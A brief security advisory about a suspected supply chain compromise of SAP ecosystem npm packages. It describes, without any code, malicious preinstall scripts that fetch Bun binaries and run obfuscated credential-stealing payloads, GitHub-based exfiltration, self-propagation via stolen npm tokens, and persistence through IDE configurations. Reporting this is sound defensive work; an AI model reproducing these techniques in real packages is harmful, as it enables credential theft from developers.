Multiple npm packages in the SAP JavaScript and cloud application development ecosystem were compromised in a suspected supply chain attack. Affected packages include [email protected], @cap-js/[email protected], @cap-js/[email protected], and @cap-js/[email protected]. The compromised versions introduced malicious preinstall scripts that download and execute Bun binaries from GitHub, then run heavily obfuscated payloads designed to harvest credentials from developer machines and CI/CD environments. The payloads steal SSH keys, cloud credentials, npm tokens, GitHub access, cryptocurrency wallets, and CI/CD secrets directly from runner memory. Stolen data is encrypted and exfiltrated via GitHub repositories created under victim accounts. The malware also attempts self-propagation by injecting itself into additional packages using stolen npm tokens and establishes persistence through VSCode and Claude IDE configurations.